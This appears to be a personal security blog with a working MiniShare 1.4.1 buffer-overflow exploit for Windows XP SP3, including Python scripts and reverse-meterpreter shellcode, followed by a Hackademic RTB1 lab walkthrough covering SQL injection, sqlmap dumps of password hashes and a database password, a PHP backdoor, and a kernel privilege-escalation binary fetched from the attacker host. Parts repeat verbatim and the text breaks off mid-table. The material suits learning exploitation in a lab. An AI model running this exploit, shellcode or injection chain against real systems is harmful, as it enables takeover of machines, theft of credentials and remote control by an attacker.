Hello again.
To learn more about writing exploits i started with a simple application that already has public exploit code available and is vulnerable to a Buffer overflow attack.
While searching for public exploits for Minishare 1.4.1 i found that there was none for Windows XP with Service Pack 3 installed.
A great first assignment for education purposes.
So my mission became to exploit the vulnerable service and take over the machine.
Lab environment:
- Windows XP with Service Pack 3 installed, MiniShare 1.4.1 running on port 8080
and installed Ollydbg for debugging the application.
- My evil Backtrack 5 R2 (of course) for generating the exploit
First thing a hacker normally does is to gather information about what is running on the server.
A portscan, OS fingerprinting and gathering information about the services running.
Since i already know what is installed on the target i will skip this part.
Gathering information about the vulnerability..
Googling around I found out that the service is vulnerable when sending a oversized HTTP GET.
Let us write a little script to see if we can "smash the stack".
-----------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x41" * 2000
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit.."
s.connect((target,port))
s.send(buffer)
s.close()
-----------
What the above does is to create a TCP packet on port 8080, Sending a GET with 2000 "A" characters, \x41 is the equivalent of A.
Adding HTTP/1.1 and 2 newlines to the end.
Saving and executing the above sends the packet.
Looking at the server we see the following
SMASHED! as we can see, it is true, the service is vulnerable.
Next: Attach the debugger to the service
Try exploiting again..
We can see that we were able to overwrite the EIP which is a very good thing.
What we need to do now is to find out where the EIP get overwritten, where we could place the malicious code, a return address is needed.
Looking at the executable modules view in the debugger we find several dlls that are loaded.
Since the application does not have a dll file and only uses the operating system dlls we can use shell32.dll or the user32.dll.
To find a return address we can right-click on the shell32.dll and choose "view code in CPU"
And search for the command JMP ESP
A return address is found with JMP ESP (important information, write it down), but we do not know the offsets. We do not know how many characters before the EIP get overwritten when running the exploit.
There are a few methods of finding this out.
For example adding ranges of (A:s) \x41 combined with \x42 (B:s) and \x43 (C:s)..
Instead of sending 2000 A:s we can send 1000 A:s and 1000 B:s and narrowing down the actual location of the EIP.
Luckily metasploit has a tool called pattern_create that creates a pattern of characters that we can later do a search for in the debugger.
creating a pattern and adding it to our exploit.
./pattern_create.rb 2000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7......o1Co2Co3Co4Co5Co
Edit the exploit code and add this pattern to the buffer.
Our new exploit code:
------------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
------------------
Sending the exploit will now reveal the following..
To find the offset we will use another tool from metasploit named pattern_offset.
Looking at the picture above we can see the offset address 36684335
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 36684335
1787
root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb Ch7C
1791
This gives us the valuable information that the register starts at 1787 characters and is 4 bytes long meaning that this is where we will add the return address.
So modifying the exploit code with the new information. Instead of sending 2000 A:s we can send 1787 A:s and add the return address we found earlier searching for JMP ESP.
After the return address we will put our exploit code, but first it is good to test that the return address is working..
One thing to note is that we are running a x86 processor, little endian reads the reverse order, so we need reverse the 4 bytes in the return address. 7CA7A787 becomes \x87\xA7\xA7\x7C
We will edit the exploit code with:
Removing the pattern and adding the below return address and adding ABCD.
-----
buffer = "GET " + "\x41" * 1787 + "\x87\xA7\xA7\x7C"
buffer+= "\x41\x42\x43\x44"
-----
Before executing the code we will create a breakpoint in the debugger to observe what is happening.
Find the JMP ESP line, "Goto, Expression" and enter the address 7CA7A787
Doubleclicking on the line will turn it red which means that the breakpoint is set, using F2 is also an option.
Run the Exploit again.
We can see from the above that we could jump to the address (7CA7A787) and add ABCD.
Excellent, this means that we can go ahead and start adding payloads and malicious code to our exploit.
So here we need to decide what we want to do. The possibilities are endless!
A bind shell, reverse shell or a messagebox saying "your hacked" or something else nasty. :)
Since my mission was to take over the machine i will go with a metasploit meterpreter which gives us huge possibilities for further exploitation.
Adding Metasploit payloads as C shellcode:
Using msfpayload or msfvenom to create a reverse meterpreter payload.
Command:
The above creates just what we need, a reverse_tcp meterpreter connection to attacker-ip on port 443.
compiled for x86 architecture, removing bad characters and output as C shellcode.
Editing our exploit code with the payload:
Instead of sending A:s i will instead send \x90 which is a NOP and basically does nothing.
While reading about exploitation i found some hints on how to increase stability of the exploit code.
Adding NOPS just before the exploit code was something recommended so i added 16 NOPS just before the metasploit payload code.
-----------------
#!/usr/bin/python
import socket
target = 'TARGET'
port = 8080
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x87\xA7\xA7\x7C"
buffer+= "\x90" * 16
buffer+= ("\xdb\xd6\xb8\x7c\xdd\x95\x46\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x49\x31\x43\x19\x83\xc3\x04\x03\x43\x15\x9e\x28\x69\xae\xd7"
"\xd3\x92\x2f\x87\x5a\x77\x1e\x95\x39\xf3\x33\x29\x49\x51\xb8"
"\xc2\x1f\x42\x4b\xa6\xb7\x65\xfc\x0c\xee\x48\xfd\xa1\x2e\x06"
"\x3d\xa0\xd2\x55\x12\x02\xea\x95\x67\x43\x2b\xcb\x88\x11\xe4"
"\x87\x3b\x85\x81\xda\x87\xa4\x45\x51\xb7\xde\xe0\xa6\x4c\x54"
"\xea\xf6\xfd\xe3\xa4\xee\x76\xab\x14\x0e\x5a\xa8\x69\x59\xd7"
"\x1a\x19\x58\x31\x53\xe2\x6a\x7d\x3f\xdd\x42\x70\x3e\x19\x64"
"\x6b\x35\x51\x96\x16\x4d\xa2\xe4\xcc\xd8\x37\x4e\x86\x7a\x9c"
"\x6e\x4b\x1c\x57\x7c\x20\x6b\x3f\x61\xb7\xb8\x4b\x9d\x3c\x3f"
"\x9c\x17\x06\x1b\x38\x73\xdc\x02\x19\xd9\xb3\x3b\x79\x85\x6c"
"\x99\xf1\x24\x78\x9b\x5b\x21\x4d\x91\x63\xb1\xd9\xa2\x10\x83"
"\x46\x18\xbf\xaf\x0f\x86\x38\xcf\x25\x7e\xd6\x2e\xc6\x7e\xfe"
"\xf4\x92\x2e\x68\xdc\x9a\xa5\x68\xe1\x4e\x69\x39\x4d\x21\xc9"
"\xe9\x2d\x91\xa1\xe3\xa1\xce\xd1\x0b\x68\x67\x7b\xf1\xfb\x24"
"\x65\xa0\xf5\x5c\x9b\x52\x0b\x26\x12\xb4\x61\x48\x72\x6e\x1e"
"\xf1\xdf\xe4\xbf\xfe\xca\x80\x80\x75\xf8\x75\x4e\x7e\x75\x66"
"\x27\x8e\xc0\xd4\xee\x91\xff\x73\x0f\x04\xfb\xd5\x58\xb0\x01"
"\x03\xae\x1f\xfa\x66\xa4\x96\x6e\xc9\xd3\xd6\x7e\xc9\x23\x81"
"\x14\xc9\x4b\x75\x4c\x9a\x6e\x7a\x59\x8e\x22\xef\x61\xe7\x97"
"\xb8\x09\x05\xc1\x8f\x96\xf6\x24\x0e\xeb\x20\x01\x94\x1d\x47"
"\x61\x54")
buffer+= " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\nSending exploit"
s.connect((target,port))
s.send(buffer)
s.close()
-----------------
We are ready to exploit the service.
On the Attacker machine we will create a multi handler listening on port 443 to receive the reverse connection from the target.
If the exploit is successful we will receive a connection from the target starting a Meterpreter session.
Executing our code...
Exploit successful!!!
We now have a meterpreter session with the target. We could get system access.
Running sysinfo will show the servername, operating system version and language.
From here we have the whole metasploit framework to our advantage.
Gathering hashdumps, creating new services, activating Remote Desktop, pivoting and more.
We own this system!!!
Mission accomplished! :)
/M
Sunday, September 23, 2012
Saturday, September 22, 2012
Learning how to write exploits
Hello again.
For many years i have stayed updated about the latest vulnerabilities and exploits, but never really took the time to learn how to actually write them. So now I decided it is time for me to learn how to write exploits.
I am doing some serious reading at the moment about the topic. Found a few good tutorials that i must go through. With not much time on my hands (children, work etc. goes first) i will go through the tutorials slowly but eventually i will get there.
The first thing i found useful if not a prerequisite is Learning python scripting.
Googled around and found some really good interactive free courses on-line. So went through some of the chapters. Since i have been writing perl and bash scripts for a while it should not be that difficult.
Really interesting.
I set up a lab environment. Just an XP box where i can install some vulnerable services.
Downloaded OllyDebugger to see how applications behave in CPU and memory stack.
So off I go! More to come...
Bye for now..
/M
For many years i have stayed updated about the latest vulnerabilities and exploits, but never really took the time to learn how to actually write them. So now I decided it is time for me to learn how to write exploits.
I am doing some serious reading at the moment about the topic. Found a few good tutorials that i must go through. With not much time on my hands (children, work etc. goes first) i will go through the tutorials slowly but eventually i will get there.
The first thing i found useful if not a prerequisite is Learning python scripting.
Googled around and found some really good interactive free courses on-line. So went through some of the chapters. Since i have been writing perl and bash scripts for a while it should not be that difficult.
Really interesting.
I set up a lab environment. Just an XP box where i can install some vulnerable services.
Downloaded OllyDebugger to see how applications behave in CPU and memory stack.
So off I go! More to come...
Bye for now..
/M
Thursday, September 6, 2012
Hacking challenge RTB1
Hello Again.
A while back i started to research web app pentesting and managed to get through the DVWA hackademic challenges, an excellent way to learn Web App Pentesting by the way.
I did not post a blog entry for this. Will maybe do that later on.
I kind of felt that my skills within this area started to become rusty so I got active again and brought on another Challenge. The RTB1.
Root this box version 1, a VMware on linux running a webserver with backend database and applications.
I did not know what to expect so i began to explore..
First setting up the environment needed in VMware with host-only networking.
- RTB1
- My evil attack machine Running BT5R2
First i started off with SCANNING AND INFORMATION GATHERING.A really important step in the process of Penetration testing.
Since i know that the host is on my local subnet i do a simple ARP-scan to find the host.
root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.
Wonderful, we have the IP-address. Next...
PORTSCAN, WHAT IS IT RUNNING?
root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
OK. A webserver, how surprising :) Lets find out more..
BANNER GRABBING
root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
OK. It seems to be running Fedora (2.2.15) with Apache as a Web Server.
Lets look at the webpages with a browser.
OK. Lets view the source of the page. http://192.168.140.133/Hackademic_RTB1/
Seems it is running WordPress 1.5.1.1
I could now run a vulnerability scan and look for exploits for automated attack, but i wanted to see if i can do something manually first.
Tempted to start attacking, we are still gathering information. It is important to get all information before running any kind of attack for best results.
More clicking. Clicked on the uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Lets add an ' to the end of the URL. and try cat=0 and so on..
Ooops. i found something. A MySQL backend :)
A table named wp_categories.
Lets find out how the table is setup and see how many columns the table has. We can do this by using the order by technique..
added: order by 1 to the end of the cat=0 statement
Seems to have at least one column.
added order by 2. Still ok
added order by 3. Still ok
added order by 4. Still ok
added order by 5. Still ok
added order by 6.
OK. From this we know that the table has 5 columns.
Using SQL union to find what column we can use for SQL command injection.
Seems that column 2 is something we can use.
Lets find out the version of the MySQL database using version()
It is running MySQL 5.1.47
More useful system commandsdatabase() Returns "wordpress"
user() Returns "root@localhost"
load_file() Lets see if we can browse local files.
Did not work with ascii /etc/hosts. Lets try with hex..
/etc/hosts converted to hex is 2f6574632f686f737473
It works! We get the hosts file.
We can also look for /etc/passwd to enumerate useraccounts and much more..
We can do alot manually, but it is easier to use some tools.
Lets try sqlmap
Lets get some tables
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema)
Very useful
Lets extract columns for the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
Now lets list all users and password hashes for users in wp_users table.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass | user_login | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames | 1 | James | Nick |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky | 0 | Bucky | Max |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10 | Miller | George |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0 | Konnors | Jason |
| a6e514f9486b83cb53d8d932f9a04292 | TonyBlack | 0 | Black | Tony |
| b986448f0bb9e5e124ca91d3d650f52c | JohnSmith | 0 | Smith | John |
+----------------------------------+--------------+------------+---------------+----------------+
We can go ahead and crack them also:
Interesting to note that user_level might be authorization level. So 10 could be the highest.
So now we have user accounts and their passwords, but we still do not have the root DBA password.
I know that the password is configured in some file somewhere on the system.
So Google is my friend.
Searched for "wordpress configuration file" and came up with the config filename wp-config.php
But i do not know the location, yet.
The httpd.conf could be helpful
After some trial and error and browsing the web for default location i tried.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/etc/httpd/conf/httpd.conf"
The file contained.
DocumentRoot "/var/www/html"
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 --file-read="/var/www/html/Hackademic_RTB1/wp-config.php"
// ** MySQL settings ** //\r
define('DB_NAME', 'wordpress'); // The name of the database\r
define('DB_USER', 'root'); // Your MySQL username\r
define('DB_PASSWORD', 'lz5yedns'); // ...and password\r
So how do I login?
Googled some more and found that the admin login interface is /wp-admin
We cracked the passwords earlier so lets login with the useraccount with the highest user_level (GeorgeMiller)
after some looking around in wordpress admin gui.
Found that uploading was disabled. As an administrator i enabled uploading of php files.
Modified a php backdoor
Activate a shell listener. and clicked on the uploaded special.php.
We have a shell!! running as the apache user.
Now we could upload metasploit meterpreters for pivoting, but since the goal is to root the box we focus on that.
We can also start password guessing, using sucrack to crack the root password.
Lets see if the system is vulnerable first.
sh-4.0$ uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
My best guess is finding a matching local privilege escalation exploit in exploitdb.
Found a few good candidate exploits..
So i started to compile and test them out.
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0
14814,platforms/linux/local/14814.c,"Linux Kernel < 2.6.36-rc1 CAN BCM Privilege Escalation Exploit",2010-08-27,"Jon Oberheide",linux,local,0
15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0
15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0
15285,platforms/linux/local/15285.c,"Linux RDS Protocol Local Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
Compile and upload the exploit
sh-4.0$ wget http://192.168.140.134/rtb1-rds
wget http://192.168.140.134/rtb1-rds
--2012-09-06 04:47:35-- http://192.168.140.134/rtb1-rds
Connecting to 192.168.140.134:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12503 (12K) [text/plain]
Saving to: `rtb1-rds'
0K .......... .. 100% 2.12M=0.006s
2012-09-06 04:47:35 (2.12 MB/s) - `rtb1-rds' saved [12503/12503]
sh-4.0$ ls -lsa
ls -lsa
total 60
4 drwxrwxrwt 6 root root 4096 Sep 6 04:47 .
4 dr-xr-xr-x 22 root root 4096 Sep 6 04:05 ..
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .ICE-unix
4 -r--r--r-- 1 root root 11 Sep 6 04:05 .X0-lock
4 drwxrwxrwt 2 root root 4096 Sep 6 04:05 .X11-unix
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 orbit-gdm
4 drwx------ 2 gdm gdm 4096 Sep 6 04:05 pulse-PKdhtXMmr18n
16 -rwxrwxrwx 1 apache apache 12474 Sep 6 2012 rtb1
16 -rw-rw-rw- 1 apache apache 12503 Sep 6 2012 rtb1-rds
sh-4.0$ chmod +x rtb1-rds
EXPLOIT
sh-4.0$ ./rtb1-rds
./rtb1-rds
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xc0aa19ac
[+] Resolved default_security_ops to 0xc0955c6c
[+] Resolved cap_ptrace_traceme to 0xc055d9d7
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
id
uid=0(root) gid=0(root)
YES! We got ROOT!
cd /root
ls
Desktop
anaconda-ks.cfg
key.txt
key.txt~
cat key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)
Regards,
mr.pr0n || p0wnbox.Team || 2011
MISSION ACCOMPLISHED!!!
A while back i started to research web app pentesting and managed to get through the DVWA hackademic challenges, an excellent way to learn Web App Pentesting by the way.
I did not post a blog entry for this. Will maybe do that later on.
I kind of felt that my skills within this area started to become rusty so I got active again and brought on another Challenge. The RTB1.
Root this box version 1, a VMware on linux running a webserver with backend database and applications.
I did not know what to expect so i began to explore..
First setting up the environment needed in VMware with host-only networking.
- RTB1
- My evil attack machine Running BT5R2
First i started off with SCANNING AND INFORMATION GATHERING.A really important step in the process of Penetration testing.
Since i know that the host is on my local subnet i do a simple ARP-scan to find the host.
root@bt:~# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.140.133 00:0c:29:e1:16:bf VMware, Inc.
Wonderful, we have the IP-address. Next...
PORTSCAN, WHAT IS IT RUNNING?
root@bt:~# nmap -v -n -P0 -sT 192.168.140.133
Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-05 09:24 CEST
Initiating Connect Scan at 09:24
Scanning 192.168.140.133 [1000 ports]
Discovered open port 80/tcp on 192.168.140.133
Connect Scan Timing: About 42.90% done; ETC: 09:25 (0:00:41 remaining)
Completed Connect Scan at 09:25, 60.14s elapsed (1000 total ports)
Nmap scan report for 192.168.140.133
Host is up (0.92s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 60.24 seconds
OK. A webserver, how surprising :) Lets find out more..
BANNER GRABBING
root@bt:~# nc 192.168.140.133 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 05 Sep 2012 01:54:43 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Sun, 09 Jan 2011 17:22:11 GMT
ETag: "31cc-5c3-4996d177f5c3b"
Accept-Ranges: bytes
Content-Length: 1475
Connection: close
Content-Type: text/html; charset=UTF-8
OK. It seems to be running Fedora (2.2.15) with Apache as a Web Server.
Lets look at the webpages with a browser.
OK. Lets view the source of the page. http://192.168.140.133/Hackademic_RTB1/
Seems it is running WordPress 1.5.1.1
I could now run a vulnerability scan and look for exploits for automated attack, but i wanted to see if i can do something manually first.
Tempted to start attacking, we are still gathering information. It is important to get all information before running any kind of attack for best results.
More clicking. Clicked on the uncategorized link and noticed the URL changed to
http://192.168.140.133/Hackademic_RTB1/?cat=1
Lets add an ' to the end of the URL. and try cat=0 and so on..
Ooops. i found something. A MySQL backend :)
A table named wp_categories.
Lets find out how the table is setup and see how many columns the table has. We can do this by using the order by technique..
added: order by 1 to the end of the cat=0 statement
Seems to have at least one column.
added order by 2. Still ok
added order by 3. Still ok
added order by 4. Still ok
added order by 5. Still ok
added order by 6.
OK. From this we know that the table has 5 columns.
Using SQL union to find what column we can use for SQL command injection.
Seems that column 2 is something we can use.
Lets find out the version of the MySQL database using version()
It is running MySQL 5.1.47
More useful system commandsdatabase() Returns "wordpress"
user() Returns "root@localhost"
load_file() Lets see if we can browse local files.
Did not work with ascii /etc/hosts. Lets try with hex..
/etc/hosts converted to hex is 2f6574632f686f737473
It works! We get the hosts file.
We can also look for /etc/passwd to enumerate useraccounts and much more..
We can do alot manually, but it is easier to use some tools.
Lets try sqlmap
Lets get some tables
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=0 --tables
This command gives us all tables in all databases (wordpress, mysql and information_schema)
Very useful
Lets extract columns for the interesting table wp_users.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T wp_users --columns
Database: wordpress
Table: wp_users
[22 columns]
+---------------------+---------------------+
| Column | Type |
+---------------------+---------------------+
| ID | bigint(20) unsigned |
| user_activation_key | varchar(60) |
| user_aim | varchar(50) |
| user_browser | varchar(200) |
| user_description | longtext |
| user_domain | varchar(200) |
| user_email | varchar(100) |
| user_firstname | varchar(50) |
| user_icq | int(10) unsigned |
| user_idmode | varchar(20) |
| user_ip | varchar(15) |
| user_lastname | varchar(50) |
| user_level | int(2) unsigned |
| user_login | varchar(60) |
| user_msn | varchar(100) |
| user_nicename | varchar(50) |
| user_nickname | varchar(50) |
| user_pass | varchar(64) |
| user_registered | datetime |
| user_status | int(11) |
| user_url | varchar(100) |
| user_yim | varchar(50) |
+---------------------+---------------------+
Now lets list all users and password hashes for users in wp_users table.
./sqlmap.py -u http://192.168.140.133/Hackademic_RTB1/?cat=1 -D "wordpress" -T "wp_users" -C "user_firstname,user_lastname,user_level,user_login,user_pass" --dump
Database: wordpress
Table: wp_users
[6 entries]
+----------------------------------+--------------+------------+---------------+----------------+
| user_pass | user_login | user_level | user_lastname | user_firstname |
+----------------------------------+--------------+------------+---------------+----------------+
| 21232f297a57a5a743894a0e4a801fc3 | NickJames | 1 | James | Nick |
| 50484c19f1afdaf3841a0d821ed393d2 | MaxBucky | 0 | Bucky | Max |
| 7cbb3252ba6b7e9c422fac5334d22054 | GeorgeMiller | 10 | Miller | George |
| 8601f6e1028a8e8a966f6c33fcd9aec4 | JasonKonnors | 0 | Konnors | Jason |
